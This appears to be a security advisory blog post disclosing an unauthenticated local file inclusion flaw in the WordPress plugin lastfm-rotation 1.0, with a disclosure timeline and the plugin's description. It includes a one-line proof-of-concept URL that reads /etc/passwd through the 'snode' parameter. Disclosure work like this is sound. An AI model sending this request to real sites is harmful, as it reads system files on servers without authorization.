wp-plugin : lastfm-rotation – Local File Inclusion

 

Plugin Details

 

Plugin Name : lastfm-rotation

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : Local File Inclusion
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd

Vulnerable Parameter : snode

Selection_010

 

Disclosure Timeline

 

Vendor Contacted : 2014-02-19

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Last.fm Rotation will display the covers for the albums you have had in heavy rotation over the last week. It uses
the Last.fm API via AJAX to fetch the data and includes a functional (albeit crude) caching mechanism to improve
performance. You can make sure Last.fm gets updated with music played from different sources by utilizing one of the many
scrobbler plugins available. For example, I use Rhapsody for music streaming, and therefore decided to use Rhobbler
to make sure that Last.fm has a complete profile on my listening habits. Please send feedback, enhancement requests,
bug details or any questions about installation to dfederighi@yahoo.com

Leave a Reply

Your email address will not be published. Required fields are marked *